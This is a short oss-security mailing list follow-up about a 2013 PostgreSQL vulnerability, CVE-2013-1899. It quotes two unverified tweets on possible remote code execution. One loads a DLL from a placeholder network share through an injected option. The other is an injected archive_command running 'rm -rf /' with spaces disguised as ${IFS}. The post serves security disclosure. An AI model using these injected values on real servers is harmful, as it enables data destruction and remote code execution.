Date: Thu, 4 Apr 2013 18:48:16 +0400
From: Solar Designer <solar@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: Re: PostgreSQL security update

On Thu, Apr 04, 2013 at 06:39:31PM +0400, Solar Designer wrote:
> A heads-up in case someone missed today's news:
> 
> http://www.postgresql.org/about/news/1456/
> http://www.postgresql.org/support/security/faq/2013-04-04/

HD Moore's quick tweets on possible exploitability of CVE-2013-1899 into
remote code execution (beyond the attack vectors mentioned in
"2013-04-04 Security Release FAQ" above):

<@hdmoore> @quine exploitation seems tricky, I wonder if -c shared_preload_libraries=\\unc\share\blah.dll is doable
<@hdmoore> @quine Another options appears to be something like: -c archive_command=rm${IFS}-rf${IFS}/

Indeed, these have not been verified yet and they might not be doable.

Alexander
